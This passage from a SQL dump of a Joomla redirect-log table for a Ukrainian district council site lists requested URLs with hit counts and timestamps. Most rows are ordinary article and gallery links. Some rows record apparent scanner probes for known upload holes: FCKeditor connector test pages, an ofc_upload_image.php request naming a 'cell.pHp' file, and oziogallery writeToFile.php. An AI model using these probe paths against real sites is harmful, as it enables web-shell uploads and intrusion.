00:00:00',301),(10081,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-05 13:14:48','0000-00-00 00:00:00',301),(10082,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:15:00','0000-00-00 00:00:00',301),(10083,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:15:06','0000-00-00 00:00:00',301),(10084,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:15:09','0000-00-00 00:00:00',301),(10085,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-05 13:15:21','0000-00-00 00:00:00',301),(10086,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-05 13:15:33','0000-00-00 00:00:00',301),(10087,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-05 13:15:59','0000-00-00 00:00:00',301),(10088,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-05 13:16:05','0000-00-00 00:00:00',301),(10089,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-05 13:16:08','0000-00-00 00:00:00',301),(10090,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-05 13:16:12','0000-00-00 00:00:00',301),(10091,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:16:22','0000-00-00 00:00:00',301),(10092,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:16:27','0000-00-00 00:00:00',301),(10093,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:16:29','0000-00-00 00:00:00',301),(10094,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-05 13:16:33','0000-00-00 00:00:00',301),(10095,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:16:36','0000-00-00 00:00:00',301),(10096,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:16:39','0000-00-00 00:00:00',301),(10097,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-05 13:16:43','0000-00-00 00:00:00',301),(10098,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:16:49','0000-00-00 00:00:00',301),(10099,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:16:53','0000-00-00 00:00:00',301),(10100,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60&Itemid=108&lang=en','','','',1,0,'2014-11-05 13:16:59','0000-00-00 00:00:00',301),(10101,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60&Itemid=108&lang=ru','','','',1,0,'2014-11-05 13:17:03','0000-00-00 00:00:00',301),(10102,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60&Itemid=108&lang=en','','','',1,0,'2014-11-05 13:17:08','0000-00-00 00:00:00',301),(10103,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60&Itemid=108&lang=ru','','','',1,0,'2014-11-05 13:17:11','0000-00-00 00:00:00',301),(10104,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60&Itemid=108&lang=en','','','',1,0,'2014-11-05 13:17:14','0000-00-00 00:00:00',301),(10105,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60&Itemid=108&lang=ru','','','',1,0,'2014-11-05 13:17:18','0000-00-00 00:00:00',301),(10106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-05 13:19:12','0000-00-00 00:00:00',301),(10107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-05 13:19:17','0000-00-00 00:00:00',301),(10108,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-05 13:19:23','0000-00-00 00:00:00',301),(10109,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-05 13:19:31','0000-00-00 00:00:00',301),(10110,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 13:19:34','0000-00-00 00:00:00',301),(10111,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-05 13:19:37','0000-00-00 00:00:00',301),(10112,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-05 13:19:40','0000-00-00 00:00:00',301),(10113,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 13:19:43','0000-00-00 00:00:00',301),(10114,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 13:19:54','0000-00-00 00:00:00',301),(10115,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:20:02','0000-00-00 00:00:00',301),(10116,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:20:04','0000-00-00 00:00:00',301),(10117,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-11-05 13:20:47','0000-00-00 00:00:00',301),(10118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-11-05 13:21:27','0000-00-00 00:00:00',301),(10119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=ru','','','',1,0,'2014-11-05 13:34:29','0000-00-00 00:00:00',301),(10120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=ru','','','',1,0,'2014-11-05 13:34:40','0000-00-00 00:00:00',301),(10121,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-05 13:42:30','0000-00-00 00:00:00',301),(10122,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-05 14:11:46','0000-00-00 00:00:00',301),(10123,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=en','','','',9,0,'2014-11-05 14:38:48','0000-00-00 00:00:00',301),(10124,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-05 15:08:01','0000-00-00 00:00:00',301),(10125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=36&Itemid=70&lang=ru','','','',15,0,'2014-11-05 16:15:48','0000-00-00 00:00:00',301),(10126,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-05 17:55:45','0000-00-00 00:00:00',301),(10127,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=36&Itemid=70&lang=en','','','',1,0,'2014-11-05 17:57:00','0000-00-00 00:00:00',301),(10128,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=53&Itemid=94&lang=en','','','',1,0,'2014-11-05 17:57:12','0000-00-00 00:00:00',301),(10129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=en&Itemid=0','','','',4,0,'2014-11-05 17:57:45','0000-00-00 00:00:00',301),(10130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 17:58:48','0000-00-00 00:00:00',301),(10131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 17:59:01','0000-00-00 00:00:00',301),(10132,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 17:59:12','0000-00-00 00:00:00',301),(10133,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 17:59:16','0000-00-00 00:00:00',301),(10134,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 17:59:45','0000-00-00 00:00:00',301),(10135,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-05 17:59:58','0000-00-00 00:00:00',301),(10136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 18:00:13','0000-00-00 00:00:00',301),(10137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-11-05 18:00:39','0000-00-00 00:00:00',301),(10138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 18:00:41','0000-00-00 00:00:00',301),(10139,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-05 18:00:48','0000-00-00 00:00:00',301),(10140,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46:--21122012&Itemid=85&lang=en','','','',3,0,'2014-11-05 18:02:42','0000-00-00 00:00:00',301),(10141,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=0&lang=en','','','',4,0,'2014-11-05 18:04:25','0000-00-00 00:00:00',301),(10142,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=0&lang=en','','','',6,0,'2014-11-05 18:04:35','0000-00-00 00:00:00',301),(10143,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=0&lang=en','','','',7,0,'2014-11-05 18:04:39','0000-00-00 00:00:00',301),(10144,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-05 19:27:28','0000-00-00 00:00:00',301),(10145,'http://malyn-rayrada.org.ua/FCKeditor/editor/filemanager/connectors/test.html','','','',3,0,'2014-11-05 21:55:30','0000-00-00 00:00:00',301),(10146,'http://malyn-rayrada.org.ua/admin/FCKeditor/editor/filemanager/connectors/test.html','','','',2,0,'2014-11-05 21:55:30','0000-00-00 00:00:00',301),(10147,'http://malyn-rayrada.org.ua/admin/editor/filemanager/browser/default/connectors/test.html','','','',2,0,'2014-11-05 21:55:31','0000-00-00 00:00:00',301),(10148,'http://malyn-rayrada.org.ua/fckeditor/editor/filemanager/upload/test.html','','','',3,0,'2014-11-05 21:55:32','0000-00-00 00:00:00',301),(10149,'http://malyn-rayrada.org.ua/admin/editor/filemanager/upload/test.html','','','',2,0,'2014-11-05 21:55:31','0000-00-00 00:00:00',301),(10150,'http://malyn-rayrada.org.ua/editor/filemanager/browser/default/connectors/test.html','','','',2,0,'2014-11-05 21:55:31','0000-00-00 00:00:00',301),(10151,'http://malyn-rayrada.org.ua/FCKeditor/editor/filemanager/browser/default/connectors/test.html','','','',4,0,'2014-11-05 21:55:31','0000-00-00 00:00:00',301),(10152,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-11-05 23:50:10','0000-00-00 00:00:00',301),(10153,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-11-05 23:50:12','0000-00-00 00:00:00',301),(10154,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-11-05 23:50:20','0000-00-00 00:00:00',301),(10155,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-11-05 23:50:23','0000-00-00 00:00:00',301),(10156,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-11-05 23:50:25','0000-00-00 00:00:00',301),(10157,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-05 23:50:39','0000-00-00 00:00:00',301),(10158,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-11-05 23:50:41','0000-00-00 00:00:00',301),(10159,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-05 23:50:44','0000-00-00 00:00:00',301),(10160,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-05 23:50:56','0000-00-00 00:00:00',301),(10161,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-05 23:51:05','0000-00-00 00:00:00',301),(10162,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-11-05 23:51:07','0000-00-00 00:00:00',301),(10163,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-11-05 23:51:30','0000-00-00 00:00:00',301),(10164,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-05 23:51:32','0000-00-00 00:00:00',301),(10165,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-11-06 00:04:06','0000-00-00 00:00:00',301),(10166,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=ru&Itemid=0','','','',12,0,'2014-11-06 00:04:26','0000-00-00 00:00:00',301),(10167,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:04:39','0000-00-00 00:00:00',301),(10168,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-11-06 00:04:41','0000-00-00 00:00:00',301),(10169,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-06 00:05:11','0000-00-00 00:00:00',301),(10170,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-06 00:05:14','0000-00-00 00:00:00',301),(10171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 00:05:30','0000-00-00 00:00:00',301),(10172,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:05:32','0000-00-00 00:00:00',301),(10173,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=ru&Itemid=0','','','',1,0,'2014-11-06 00:05:42','0000-00-00 00:00:00',301),(10174,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:--------','','','',1,0,'2014-11-06 00:06:22','0000-00-00 00:00:00',301),(10175,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:--------&Itemid=&lang=en','','','',1,0,'2014-11-06 00:06:24','0000-00-00 00:00:00',301),(10176,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:--------&Itemid=&lang=ru','','','',1,0,'2014-11-06 00:06:27','0000-00-00 00:00:00',301),(10177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:--------&Itemid=&lang=uk','','','',1,0,'2014-11-06 00:06:29','0000-00-00 00:00:00',301),(10178,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-06 00:06:43','0000-00-00 00:00:00',301),(10179,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&catid=53&Itemid=94&lang=ru','','','',1,0,'2014-11-06 00:06:59','0000-00-00 00:00:00',301),(10180,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&catid=53&Itemid=94&lang=uk','','','',3,0,'2014-11-06 00:07:02','0000-00-00 00:00:00',301),(10181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-06 00:51:19','0000-00-00 00:00:00',301),(10182,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53&Itemid=94&lang=ru','','','',4,0,'2014-11-06 00:52:02','0000-00-00 00:00:00',301),(10183,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 00:52:16','0000-00-00 00:00:00',301),(10184,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:52:19','0000-00-00 00:00:00',301),(10185,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 00:52:23','0000-00-00 00:00:00',301),(10186,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:52:27','0000-00-00 00:00:00',301),(10187,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 00:52:45','0000-00-00 00:00:00',301),(10188,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:52:50','0000-00-00 00:00:00',301),(10189,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 00:52:53','0000-00-00 00:00:00',301),(10190,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:52:56','0000-00-00 00:00:00',301),(10191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-06 00:53:30','0000-00-00 00:00:00',301),(10192,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-06 00:53:34','0000-00-00 00:00:00',301),(10193,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 00:53:37','0000-00-00 00:00:00',301),(10194,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:53:40','0000-00-00 00:00:00',301),(10195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-06 00:54:02','0000-00-00 00:00:00',301),(10196,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-06 00:54:18','0000-00-00 00:00:00',301),(10197,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:54:20','0000-00-00 00:00:00',301),(10198,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-11-06 00:54:31','0000-00-00 00:00:00',301),(10199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:54:34','0000-00-00 00:00:00',301),(10200,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 00:55:21','0000-00-00 00:00:00',301),(10201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=uk&Itemid=','','','',4,0,'2014-11-06 00:55:24','0000-00-00 00:00:00',301),(10202,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 00:55:28','0000-00-00 00:00:00',301),(10203,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:55:32','0000-00-00 00:00:00',301),(10204,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 00:55:34','0000-00-00 00:00:00',301),(10205,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 00:55:40','0000-00-00 00:00:00',301),(10206,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=ru&Itemid=0','','','',1,0,'2014-11-06 01:02:53','0000-00-00 00:00:00',301),(10207,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=0&lang=ru','','','',2,0,'2014-11-06 01:03:16','0000-00-00 00:00:00',301),(10208,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=977:2013-03-22-13-03-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-11-06 01:07:38','0000-00-00 00:00:00',301),(10209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=en','','','',5,0,'2014-11-06 02:27:21','0000-00-00 00:00:00',301),(10210,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=32&lang=ru&fb_locale=ru_RU','','','',1,0,'2014-11-06 02:31:04','0000-00-00 00:00:00',301),(10211,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=en','','','',2,0,'2014-11-06 03:25:03','0000-00-00 00:00:00',301),(10212,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cell.pHp&141105-233835','','','',1,0,'2014-11-06 07:38:37','0000-00-00 00:00:00',301),(10213,'http://www.malyn-rayrada.org.ua/index.php?option=com_community&view=frontpage&141105-233839','','','',1,0,'2014-11-06 07:38:41','0000-00-00 00:00:00',301),(10214,'http://www.malyn-rayrada.org.ua/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php?141105-233842','','','',1,0,'2014-11-06 07:38:44','0000-00-00 00:00:00',301),(10215,'http://www.malyn-rayrada.org.ua/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php?141105-233846','','','',1,0,'2014-11-06 07:38:48','0000-00-00 00:00:00',301),(10216,'http://www.malyn-rayrada.org.ua/index.php?option=com_jdownloads&Itemid=101&view=upload&141105-233851','','','',1,0,'2014-11-06 07:38:53','0000-00-00 00:00:00',301),(10217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=ru','','','',1,0,'2014-11-06 09:27:34','0000-00-00 00:00:00',301),(10218,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 10:22:25','0000-00-00 00:00:00',301),(10219,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:22:32','0000-00-00 00:00:00',301),(10220,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=en','','','',1,0,'2014-11-06 10:22:39','0000-00-00 00:00:00',301),(10221,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=ru','','','',3,0,'2014-11-06 10:23:56','0000-00-00 00:00:00',301),(10222,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=ru&Itemid=','','','',5,0,'2014-11-06 10:24:01','0000-00-00 00:00:00',301),(10223,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=en','','','',1,0,'2014-11-06 10:24:10','0000-00-00 